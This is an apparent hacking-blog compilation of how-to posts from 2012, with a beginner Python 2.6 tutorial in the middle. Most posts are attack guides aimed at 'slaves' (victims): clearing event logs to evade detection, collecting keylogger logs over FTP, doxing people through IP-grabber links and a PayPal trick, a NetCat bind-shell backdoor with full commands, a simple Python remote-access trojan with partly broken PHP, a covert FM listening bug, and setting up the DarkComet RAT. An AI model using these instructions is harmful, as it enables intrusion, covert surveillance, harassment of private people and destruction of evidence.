Thursday, May 31, 2012


Tutorial contains:
  • How hackers get caught.
  • Hiding you and securing as "Hacker".
  • Destroying your system logs.
  • Setting up VPN - Making you anonymous.

Okay, let's begin!

1) How hackers get caught.

- First stuff that gives you away are "LOGS".
You need to know how events, application, and system logs work. If you dont, you can be easily caught!
The shell history will expose your actions.
Another giveaway is leaving a “:wq” in /var/log/messages or binarys.

- Your laziness will take you into problems.
NEVER HACK FROM HOME! Take your time, and go to net cafe or anywhere else apart from home. Logs will take you down!

- The code that you run on system will take you down. If you compile the code on target, libraries will give you away!

- If your victm, notice, that he is maybe hacked, or something is wrong.. He will ask from his ISP for IP logs, and if you dont use VPN, or if you hack from home, they will hunt you down.

- Thing, that takes you down 100% is BRAGGING. It is common problem of beginning hackers. They like to brag, to earn respect and reputation but NOT KNOWING that is the matter of minutes, hours mby days when they will be caught.
*Don't use hotmail. CIA Owns it.

2) Hiding and Securing you as "Hacker"

- Temporary guest accounts, unrestricted proxy servers, buggy Wingate servers, and anonymous accounts can keep hackers carefree.

*A young hacker is less likely to know all the little things that an expert hacker might know. Besides, the young hacker may be trying to impress others - and get a little careless about covering his tracks. This is why younger hackers are often caught.
*An older hacker, on the other hand, will rarely leave any tracks. They know how to use their slave's computers as a tool for a launching place to get into another computer.

There will always be hackers, and there will always be hackers in prison.




Choose Start > Control Panel.
Double-click Administrative Tools, and then double-click Event Viewer.
In either pane of the Event Viewer window, right-click System and then select Clear All Events.
To save the current system log, click Yes when Windows returns the message, "Do you want to save 'System' before clearing it?", enter a file name for the saved system log file, and then click Save.

Virtual Private Network - VPN(Click on spoilers)
I will recommend you to use proXPN.
It is VPN that do not store logs.

ProXPN Windows installation:

(I used images from proXPN official website)

[Image: proxpn_windows_install_001.png]

Click "Next"

[Image: proxpn_windows_install_002.png]

Just click "Agree" here to continue installation.

[Image: proxpn_windows_install_003.png]

Let the installer run until completion.

[Image: proxpn_windows_install_004.png]

Just click the "Finish" button to complete the installation.

[Image: proxpn_windows_install_005.png]

Welcome to the proXPN client. Click the "Don't have an account?" link to create a new account.

[Image: proxpn_windows_install_006.png]

Enter your email address and the password of your choice. Then check the license agreement checkbox and click the "I agree - create account" button.

[Image: proxpn_windows_install_007.png]

Click "OK" to finish the account signup process in the software client.

[Image: proxpn_windows_install_008.png]

Check your email for a greeting email from proXPN. In that email is a link which you will need to click in order to activate your free account. If it doesn't show up within a reasonable timeframe, make sure to check your spam folders. Once you've clicked the link in the email, your account should be active. Go ahead and click the "connect" button to connect to proXPN

[Image: proxpn_windows_install_009.png]

Once you connect, the system tray icon will turn green. You're now surfing safe and secure, courtesy of proXPN.

And you are done with securing yourself.
Just to make sure, go check if you are truly anonimous ;)

Wednesday, May 30, 2012

this tutorial is for those of you who DONT know how to recieve log files from your keyloggers such as Ardamax Keylogger, Albertino Keylogger,etc....Hehe
FTP is like an online storage account. You make one so that your keylogger can send you log files there and you can download those log files and view them from where ever you are.Devlish
The best ftp site according to me is
1) Goto this site, and click on the sign up button in first section where it says "Online File Storage and Sharing"
The Sign up Page should look like this:
[Image: tut1signupdhq.jpg]
2) Fill in the necessary details and finish sign up. Once you're done, sign into your account.
3) Click On- "New Folder".
[Image: newfolder.jpg]
4) Name your folder- "logs"
[Image: logsy.jpg]
The Folder Should show up like this-
[Image: logsmade.jpg]
The FTP part is now done.
Open your Keylogger Application- I'll show you how to use Ardamax Keylogger to send FTP logs.

1) Open Ardamax>Right-Click System Tray Icon>>Options>>Delivery>>FTP
2) Here you type in the following:
[Image: ftpaklsetup.jpg]
FTP Host:
Remote foler: \logs (you should've made this folder in your FTP account by now)
Port: 21 (This is automatically given)
Username: [your username goes here]
Password: [your password goes here]
Once done, click on TEST

You should see the following message:click "OK"
[Image: testsuccesful.jpg]
Now goto Control (this button's just above the FTP button).
Chose the following settings:
[Image: controlb.jpg]
you will recieve log files in your drive hq account from the computer you keylogged.

[TUT]How to Dox[TUT]

This tutorial is for informational purposes only. I am not responsible if you use this information. This information can be used for illegal purposes, and I am not responsible for how you use the information. This tutorial is for informational purposes only. You use this information/tutorial at your own risk.

Hey guys, I'm Lulzy I spent a lot of time working on this, so please reply to the thread to keep it alive. Thanks :)

What you will need:
  • Basic Social Engineering skills
  • Notepad
Before we start, I suggest using this for doxing. This will help keep things organized.
PHP Code:
IP address:
Operating System:
Home Address:
Phone number:
Cell Phone number:
You can add more to this list if needed.

How to get IP address?
I suggest using
On this website, you enter your e-mail, and you get a set of links. Pick any link, copy and paste, and give the link to your slave saying something similar to this "LOL THIS IS HILARIOUS". Once clicked, the IP will be sent to your e-mail

If your slave has e-mailed you, you can get the IP from looking at the e-mail source. To look at the e-mail source for Windows Live users, right click on the message, and click 'View Message Source'.
When you're looking at the source, look for this: 'Received: by'
It will show you an IP address. This is the IP address of your slave.

If your slave has commented on your blog (wordpress or blogspot) you can view the IP address by looking in your comments.

Once you have the IP address of your slave, go to and enter the IP of your slave. You now have the location, zip code, state, country, ISP, and operating system. Fill all this in your notepad and keep going.

How to get e-mail?
If you do not have trust of your slave, Google the user and put @ at the end. Example: 'username' @
If the user has posted their e-mail on any website, it should come up and you can find his e-mail.

If you do have trust of your slave, make a new msn account(if you don't want them having your main msn), have him/her add you on msn. You now have the e-mail of your slave.

Put in the e-mail of your slave in Facebook search. If your slave uses Facebook, you can find out (at the minimum) their name. If your slave uses Facebook but does not protect their information, you can find out loads of information.

The PayPal Method:
When you have the e-mail of your slave, login to PayPal. Transfer .01 USD to the e-mail of your slave. When sent, you will have all of the information on the PayPal account. (Name, address, phone, etc.)

Tracing Photos:
If your slave has photos online, save the photo and go to a website named
On this website, upload the picture of your slave. When it is finished, you can find if this photo is uploaded on any other websites. You can also find out if the photo is fake.

If you have the name of your slave, it is possible you can find the address of your slave. I suggest using the following websites:
Using these websites you can also find out their phone.

If your slave has a website, put the website in
If the website owner does not use WHOIS Guard Protect, you can find out all information about him (name, phone, address, etc.)

This tutorial is for informational purposes only. I am not responsible if you use this information. This information can be used for illegal purposes, and I am not responsible for how you use the information. This tutorial is for informational purposes only. You use this information/tutorial at your own risk.

That's the end of the tutorial, hope you enjoyed.

Creating a backdoor, and connecting to it, with NetCat

Most of you are probably asking what is NetCat? To make it simple, NetCat/NC makes and accepts Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) connections. Literally that's it lol

This is for the newbees who dont know what NC is and want to know how to backdoor using this software.

How to make a persistent backdoor with NetCat

This is the overview of what we are going to be doing. The fist thing we want to do is put nc.exe, which is the executable file, in system32. Then After that we are going to head to CMD and make a persistent listener.

1. Downlaod NC

2. Place NC.exe in system32

3. Go to CMD and type this Command Line.

nc -v -L -p 8080 -e cmd.exe

Let me explain the code, -v is verbose, -L is to make it Listen which is different from -l because if you would have put -l parameters instead of -L parameters, once you close the CMD window, the NC session will be closed as well. -p is the port you want to listen to. -e is the executable program you want to launch once the connection is established, in our case, command prompt.

Now you can close the window and still have NC listening on port 8080. Now that you have backdoored the remote machine with it, its time to connect to it.

On the attacking machine, go to CMD and type this command line:

nc -v [IpOfTargetMachine] 8080

Once you hit enter, you will have CMD access to the remote computer!

Thats about it. If you have any questions about any of this, feel free to ask.

Fundamentals of Python 2.6

Tutorial Components:

Python Description
Why Python
Could Python Get Me a Job

Installing Python
Choosing an IDE
Creating your first script
Running your first script

Installing Python
Choosing an IDE
Creating your first script
Running your first script

How to Import Modules
Time Module
User Input
Logical Operators
If, Else, Elif
While Loop
Creating a Basic Calculator

Helpful Resources:
Python 2.6 Documentation
A Byte of Python


Python Description:

Python is a scripting language, meaning that it does not need to be compiled. Python works on almost all OS. Pythons’ syntax is all about tidiness and legibility, this is because of whitespace.

Why Python:

Python is a very wise choice for programming because it is a fairly easy language to learn, yet so powerful and useful. Python code is also very easy to read this is important because if you make a mistake you can easily see where it is, also if you are programming with someone else they can easily pick up where you left off. If you are going to learn a language such as Perl, you will notice that if you are looking at someone else’s source code it gets very confusing unless they are commenting there code. In Python it is good to comment the code but if you don’t it is a lot easier to read and understand what is going on then many other languages.

Could Python Get Me a Job:

Yes, many people and corporations need Python programmers. Python is a language this is used very much in the world today. Here is a list of companies and applications that use Python.

Applications: BitTorrent, Deluge, Emesene, Portage, Quake Army Knife, and many more

Games: Civilization 4, Battlefield 2, Eve Online. Freedom Force, Frets on Fire, The Temple of Elemental Evil, Vampire: The Masquerade - Bloodlines, Vegas Strike.

Companies: Blizzard, Firaxis Games, Google, Nasa, and many more.

Definitions for Introduction:

Syntax: is how the programming language is structured and what rules apply for it. For example in Python when you indent something it has to be 4 spaces or else you get a syntax error.

Whitespace: is basically anything that you do that involves the tab key and the enter key.

Comments: is a symbol that you use to skip a selection of information from the interpreter or compiler.


Installing Python:

Installing Python on Windows is an extremely easy process. Go to this site, if you have a 32-bit operating system then download Windows x86 MSI Installer. If you have a 64-bit operating system download Windows x86-64 MSI Installer. Then just run the .exe and follow the install. then you have Python on your computer.

Choosing an IDE:

Choosing an IDE is very important for any programming language, but it is not absolutely necessary. You could programming in notepad but I recommend you don’t because there is no syntax highlighting and it would just get irritating. Two IDEs that I recommend are Notepad++ or Eclipse.

Notepad++: If you decide to download Notepad++ then you have to of course first install it. Here is the download link: Notepad++. Then you run the .exe and install it. To change the syntax highlighting to Python go to Language > P > Python now notepad++ has changed the syntax to Python.

Eclipse: If you decide to download Eclipse, you need some other stuff to make Eclipse work. I recommend following these two guides. How to Install Eclipse and How to Setup Python on Eclipse.
Once you have Eclipse up and running you have to go the Update Manager > Help > New Software and add in the Work with textbox, then click Add. Then select PyDev and PyDev Mylyn Intergration (optional). Then click Next, wait until the progress bar fills up and then you will go to Install Details, click Next. You will go to Review Licenses click on the I accept the terms of the license agreements, click Finish. Then finish the installation and restart Eclipse. You still have to add the Python Interpreter, since I am on Linux I recommend you follow this guide. Setting up PyDev

Creating your First script:

For the sake of less errors (because I am on Linux), I am going to tell you how to make your first script in Notepad++. You can use IDE you want it doesn't really make a difference, it is just prefernce.When you first start your script you want to add the shebang line.


The importance of the shebang line is that it tells the script where the interpreter is located.

print "This is HeadRushs' Python 2.6 tutorial."

This line of code print "This is HeadRushs' Python 2.6 tutorial." displays the text within the quotations to your script. If you just wrote "This is HeadRushs' Python 2.6 tutorial" it would not work because you didn't write print or include the quotations.

Running Your Script:

Now you have your first script, it will display This is HeadRushs' Python 2.6 tutorial. Now save the script as Now if you double click on the script there should be a window that pops-up, it should like Command Prompt. It will open up for a second and close that is okay we will fix that later.


Interpreter: changes the source code into another code and executes the new code. In Python the source code gets translated into bytecode.


Installing Python:

Most distros come with Python 2.6 already installed, if you don't have Python 2.6 installed on your distro just type this.

(root) (package manager) (install code) python

For example if you run Linux Mint, you will write in something like this.

sudo apt-get install python

As you can see sudo gets you in to root, apt-get is the package manager, the install code is install, and I wrote in python at the end because we are installing Python.

Choosing an IDE:

Choosing an IDE is a very important no matter what language you are programming in. In my opinion setting up an IDE for Python in Linux is a lot easier than in Windows. I am going to recommend the two following IDEs to program in Python, gedit or Geany.

gedit: If you decide to use gedit you need to download it, here is the download link. gedit Now of course you have to install gedit. Once you have gedit installed you want to change a few things to make it more ideal for Python. Now you have to go the Statusbar and click on Plain Text > Python. Now since that standard indentation in Python is 4 spaces change the Tab Width to 4. Now you are ready to use gedit as a Python IDE.

Geany: I personally love this IDE, the best part of it is the built-in terminal so you can test your scripts from the IDE. If you decide to use Geany, here is the download link. Geany The one thing that you will realize right away, is that it doesn't automatically highlight the syntax. So the first thing I always do is Save As right away, and name your script Now the IDE will use the Python syntax. You are now ready to program in Python.

Creating Your Script:

The IDE I am going to be using is Geany, you can use whatever IDE you want it doesn't make a difference, it is just preference. I prefer Geany so I am going to be using it. The first line of your script needs to be the shebang line.


The importance of the shebang line is that it tells the script where the interpreter is located.

print "This is HeadRushs' Python 2.6 tutorial."

This code print "This is HeadRushs' Python 2.6 tutorial." displays the text in quotations, in this case it displays This is HeadRushs' Python 2.6 tutorial. The text would not be displayed without print or the quotations.

Running Your Script:

In Linux running a script is easy, all you have to do is write python and the location to your script into terminal. If your script was named and on the Desktop you would write.

python Desktop/

You will see that in terminal it displays This is HeadRushs' Python 2.6 tutorial.


Interpreter: changes the source code into another code and executes the new code. In Python the source code gets translated into bytecode.


How to import modules:

Importing modules is important in any programming language, especially Python because you can only do so much in Python without importing modules. If you are using Windows you almost can't do anything without importing modules, there is a module to make the Command Prompt like screen stay open while just printing text. Now we will get to importing modules, to import a module you simply have to write import and your desired module you would like to import. For example we will important an import module, the time module. That module is especially important for Windows users.

import time

That is all you have to do to import a module. If you want to give the module a name besides its default name then you can do it by writing this.

import time as t

Now as you can see time is know to the script as t, and if you want to use the module it has to be called t not time.

Time Module:
The time module is used to stop the programming for a certain amount of time. On Windows if you don't use the time module the only time that the script will stop without closing right away is if you are asking for user input. So for Windows users and also Linux users time is an important module and in my opinion is the most important module. To use the time module all you have to do is write sleep(and number of seconds you want the script to stop for). Here is an example of the time module code needed for making the script stop.


As you can see I want the script for 3 seconds so I put 3 in the brackets.


Comments are used to show people what your code is doing and what it means, they are also used for adding information about programmer, and anything else the programmer wants to add in. Comments just get skipped by the interpreter. The two comments I will be showing are inline comments and documentation strings.

Inline Comments: are just supposed to be used at the end of the code to explain what it is doing, although you could use it for anything you want. Here is an example of an inline comment.

print "Hello World" #this is an inline comment, as you can see it won't show up on your script

Documentation Strings:
are just strings that you can fit lots of information in, like if you are trying to explain what your if statement is doing exactly than it would be easier using documentation strings rather than comments. Here is an example a documentation string.

"""This is my documentation string
as you can see this will not show up on our script
now I want to end the documentation string
print "Hello World"


Variables are just data types that store information, there are a couple different kinds of variables that we will be going through in this tutorial. Some of these variables are integer and float. Variables are very important in any programming language because they hold information that the programmer might enter or information that the user might enter. First we will go over integer.

integer: is referred to in python as int. Integers hold numbers that don't have decimal numbers and also hold integers, they can hold decimal numbers but float is recommend for holding decimal numbers. Here is an example of a script with integers in it.

x = 5
print x

As you can see in this script we declare x (is by default an int) as 5. Then we print out x, and we get the output 5.

Next we are going to go over float, with float you can hold large decimal numbers. Float is a very good variable to use if you are making a script with math in it. Here is an example of a script with integers in it.

x = float(5.534)
print x

As you can see we declare x as float 5.534, we have to put float(5.534) because that means 5.534 is now a float variable.

Now string, string is a lot more complicated than float and integers because you have to use it with float and integers sometimes. A string is basically text that has been stored, it can also be numbers. We are going to go over how to put text in a string, then we will put what we learned all together.

x = str("HeadRush")
print x

As you can see x is now been declared as a string(str). You have to put your text in quotations within the brackets for the text to be declared as a string.

Now lets put everything we know together.

import time
age = 15
height = float(5.8)
hr = str("Headrush")
print hr + " is " + str(age) + " years old and is " + str(height) + " feet tall."

So we should be able to understand everything to this point except this line of code: print hr + " is " + str(age) + " years old and is " + str(height) + " feet tall.". We will break down this code first you we will look at this part print hr + " is ". So we print out the variable hr, and when you are mixing a variable with a print statement it has be a string so we put str(variable) but since we did that we don't have to worry about it. We add + (or you could use a ,) because we are adding more stuff to the print statement and then " is " prints out is. Next we will look at str(age). We have to put str(age) because age is a variable with a number and is not a string and you can not mix a variable with the print statement at has to be a string so we convert it to a string. All the rest of the code should not be self explanatory.

User Input:

User input is extremely easy in Python, but none the less it's very important. User input is important because if you make any script you almost need user input no matter what kind of script you make. Here is an example of user input in a script.

import time
yourName = str(raw_input("What is your name: "))
print "Hello " + yourName + "!"

We are just going to over this yourName = str(raw_input("What is your name: ")). So, we see that we call str(raw_input("What is your name: ")) yourName. So we declare everything inside of the str(raw_input("What is your name: ")) as a string. Next you see raw_input this is what allows the user to input information, next we see a bracket ( because everything inside of this bracket is text to say what we want from the user. Now we close both brackets and we have the code for the user to input information and it is a string.

Logical Operators:

Logical operators are just operators to compare or modify information, in this tutorial we will just cover the basic operators times (*), add (+), and divide (/). Here is a script with each of the operators in it.

import time
times = 2 * 2
add = 1 + 1
divide = 9 / 3
print times, add, divide

This is pretty self explanatory, although instead of using time + add + divide we use a comma because if we didn't do that we would all the variables together.

If, Elif, Else:

This is probably one of the most important things to know in programming because we compare information and we make sure the person using are script does not get errors and the script closes on them automatically. The most important thing about if, elif, and else statements is they require indents it is like having { in any other language, so they have to be separated from the rest of the code by indenting 4 spaces. Here is an example of a script with if, elif, and else in it.

import time
yourName = str(raw_input("Please enter your name: "))
if yourName == "HeadRush":
    print "You are making this tutorial!"

elif yourName == "Nyx-":
    print "You are an anime master"

    print "Oh welcome to this script."

print "Goodbye this is the end of the if, elif, and else script."

As you can see first we ask for the users' name, then we start the if statement. When you are comparing something in an if statement and if it is something for example HeadRush, we have to use == because that means if it equals something. Then we see "HeadRush" this is just there because if the users' name is HeadRush then we continue on with the if statement, we have to put a : at the end because it just means we continue with the stuff below. As you can see after the if statement we have to space 4 times or tab it because that is just how if statements and other things are because it follows it and it sees the information separate from everything and executes the code. Now we see elif, so if the users' name is Nyx- we print out the following information.
At the end we see else, so if your name is not in any of the other statements it the script follows the else statement.

While Loop:

For the while loop we look at a two things the loop itself and break. Break is just what we write to end the loop. For the while loop the loop won't stop until we use break. Now for a loop we have to use boolean, which is true or false. If a loop is true then it is running if it is false then the loop stops. The loops is an extremely good part of a script if you have a menu but we won't go through that in this tutorial. Here is an example of a loop.

import time
yourName = str(raw_input("Please enter your name: "))
while True:
    if yourName == "HeadRush":
        print "You are making this tutorial!"
    elif yourName == "Nyx-":
        print "You are an anime master"
        print "Oh welcome to this script."
print "Goodbye this is the end of the if, elif, and else script."

As you can see the while loop is just while, and we use True because we want the loop active. It goes through or previous if script now you see break, break just exits the loop or else it wouldn't stop repeating itself until you manually closed it. The rest of the script is the exact same.

Creating a Basic Calculator:

I am not going to go in depth with this calculator if you don't understand any part of the calculator just refer back to the tutorial. By the end of this tutorial you should be able to make a basic calculator like this.

import time
print "Welcome to HeadRushs' ending tutorial Calculator!"
print "1) add"
print "2) subtract"
print "3) multiply"
print "4) divide"
userChoice = int(raw_input("Enter a number as an option: "))
while True:
    if userChoice == 1:
        addNumberA = int(raw_input("What is the first number you would like to add: "))
        addNumberB = int(raw_input("What is the second number you would like to add: "))
        addEquals = addNumberA + addNumberB
        print addEquals

    elif userChoice == 2:
        subtractNumberA = int(raw_input("What is the first number you would like to subtract: "))
        subtractNumberB = int(raw_input("What is the second number you would like to subtract: "))
        subtractEquals = subtractNumberA - subtractNumberB
        print subtractEquals

    elif userChoice == 3:
        multiplyNumberA = int(raw_input("What is the first number you would like to multiply: "))
        multiplyNumberB = int(raw_input("What is the second number you would like to multiply: "))
        multiplyEquals = multiplyNumberA * multiplyNumberB
        print multiplyEquals

    elif userChoice == 4:
        divideNumberA = int(raw_input("What is the first number you would like to divide: "))
        divideNumberB = int(raw_input("What is the second number you would like to divide: "))
        divideEquals = divideNumberA / divideNumberB
        print divideEquals

        print "You have chosen an invalid option, goodbye"

print "I hope you enjoyed my tutorial and learned a lot."

Helpful Resources:

Python 2.6 Documentation:

Python 2.6 documentation link is right here Python 2.6 Documentation. I always refer to this when I have an issue with Python because it has really good explanations of the code and is really easy to follow.

A Byte of Python:

A Byte of Python is an extremely good book to download, I am currently reading it. It goes through the information fast but if you don't understand something refer to a website and try to understand the code. Here is a link to A Byte of Python: A Byte of Python, if you don't want to download it you can read it online.

Tuesday, May 29, 2012

[TuT]Make a Basic FUD Web Browser Based RAT in Python[/TuT]

This tutorial will teach you how to create a RAT in which the server is written in Python but the client can be accessed via any web browser.
Note: This tutorial will only show you the very basics. We will only be adding one command. This command will allow you to open a webpage of your choice on the slave's computer. You'll have to add the rest on your own.
Note: You can only execute one command every 5 seconds due to the sleep(5); in the manager.php file. You can change this by changing the 5 but I don't recommend it due to connection issues.

Python Server Writing
Here is our base Python script:

Quote:import webbrowser
import urllib2
while True:
(insert tab here)command = urllib2.urlopen("http://YOURHOST/command.txt","r").read();
(insert tab here)commandinfo = urllib2.urlopen("http://YOURHOST/commandinfo.txt","r").read();
(insert tab here)if command == "testwebpage":
(insert double tab here)webbrowser.open_new(commandinfo);
(insert double tab here)break;
Name the file anything you want.
Be sure to also create two blank text files; command.txt & commandinfo.txt. Be sure to upload them to your host and replace YOURHOST with, well, your host. Also, replace (insert tab here) with a tab (indent) and (insert double tab here) with a double tab (double indent). And yes, these do matter.

PHP Writing
Create a PHP file with the following code and upload it to the same host as the text files. Name it manager.php.
PHP Code:
$_GET['action'];$data $_GET['data'];$info $_GET['info'];

$action="delete"){sleep(5);unlink("command.txt");unlink("commandinfo.txt");$open fopen("command.txt",'a');$open2 fopen("commandinfo.txt",'a');fclose($open);fclose($open2);

$action="write"){unlink("command.txt");unlink("commandinfo.txt");$open3 fopen("command.txt",'a');$open4 fopen("commandinfo.txt",'a');fwrite($open3$data);fwrite($open4$info);fclose($open3);fclose($open4);

Client Writing
Create a HTML file with the following code in it. Name it client.html. Upload it to the same host as everything else.
<form action="clientmanager.php" method="get">
<input type="text" name="command" /><br />
<input type="text" name="commandinfo" />
<input type="submit" name="Execute" />

Create a PHP file with the following code in it. Name it clientmanager.php. Upload it to the same host as everything else.
PHP Code:
$_GET['command'];$commandinfo $_GET['commandinfo'];$url 'manager.php?action=write&data=' $command '&info=' $commandinfo;
'<iframe width="0" height="0" src="' $url '"></iframe>';
'<META HTTP-EQUIV=REFRESH CONTENT="0;URL=manager.php?action=delete">'?>

Now execute the Python script via IDLE (comes with Python) and visit client.html in your favorite web browser. In the first box, type testwebpage. In the second box, type the URL that you want to be opened. Click Execute and watch the magic happen!

Make your own FM Spy Bug!

Creating a Spy transmitter.

This is my first tutorial, so it might have errors.Smile

Introduction to the transmitter.

In this tutorial, I will show you how to make a small inexpensive and easy to build spy transmitter that can have a 1/2 mile range!

First, you should know the basics of electronics, such as transistors, resistors, capacitors and Soldering!


Q1+Q2= 2- 2N3804 NPN transistors (most NPN will work, but the 3904 is my favorite becaues the leads match the schematic)
Electret= 1- eletret mic
R1= 1- 20k-30k resistors
R3= 1- 10k resistors
R2= 1- 100k restistor
R4= 1- 4.7k resistor
C1,C2,C6= 2- 104 capacitors (0.1uf)
C5= 1- 10p (picofarad) capacitor
CC4= 1- 10p-50p capacitor
R5= 1- 100 resistor
1-9 volt battery clip
18" of cat5 (phone line) or similar wire 20AUG
1"x2" perfeorated board

Plenty of time.

Here is the Schematic for the Transmitter:

[Image: fmtx.png]

Once you have gathered all the parts, cut your perf bord into a 1" by 2" rectangle.
Then lay out the parts starting with the Mic, and Start soldering.
Make sure that the side of the mic that is connected with R1 has a small + symbol!

Making the coil

When you get to the coil, wrap 5-8 turns of 20AUG or simlar wire around any round thing that is 4-6mm. Such as a screwdriver. Scrape the insulation or enamel off the leads of the coil.
Here is a example from another website:[Image: 6.jpg]

solder on the battery clip, and get ready to test!

Here is my finished transmitter:[Image: myspyprojects002.jpg]

Tune time!

Turn on a FM radio, set it 1 meter away, and tune it to a blank spot (no station) now, plug the battery to the clip, and use any small plastic screwdriver to move the coils appart starting at one end until you here a squeel. <That will tune the transmitter to a frequency on the FM band.

Great, you have tuned your Transmitter! Yeye
Ajust your radio to pick up the TX better, and place the transmitter near some sound(ticking clock, music..) move your radio as far as you can while still hearing the sound from the transmitter.Biggrin Open fields are perfect for this.

Need help, Post and I will try to answer all your questions!Smile

Have fun!

How To Setup Darkcomet RAT [TUT] With Pictures.

Download Darkcomet-RAT here
First, you will need to portforward. I will not provide a Tutorial for that you can find that out yourself or you can pm me and i will be happy to do it for you.

Next, make an account on
After you make the account there, click on Add a Host.
[Image: lXWcus.png]

Just change the Hostname to whatever you want. and make it leave evrything else then click Create Host.
[Image: AttdEY.png]

Now download the No-IP DUC Client Here:

After you do that, login to your No-IP account and they should have an option for Select Hosts. Click that. Choose the host you made. I have a couple I made before this. Don't mind those.

[Image: NRIj3t.png]

Now, open up Darkcomet, click on Sockets List at the bottom. Right click and click Add Port To Listen. Now whatever port you forwarded, type that in. I forwarded port 100 so I will enter that there.
[Image: stkTnx.png]

Now go back to Connections and click Edit Server then Server Module at the top.
[Image: MPFImj.png]

Now. Follow the pictures for each section!

Main Settings (Hit Generate next to Mutex a couple times)
[Image: qQ4lf8.png]

Network Settings: On IP/DNS, enter the No-IP Hostname you chose. And on Port, enter the port you forwarded and are using. Then click Test Network.
[Image: pOdiim.png]

Now skip all the rest until you get to Build Module. Click UPX. Then build your server.
[Image: u8EV8P.png]
Now you are done. Test your server by running your file.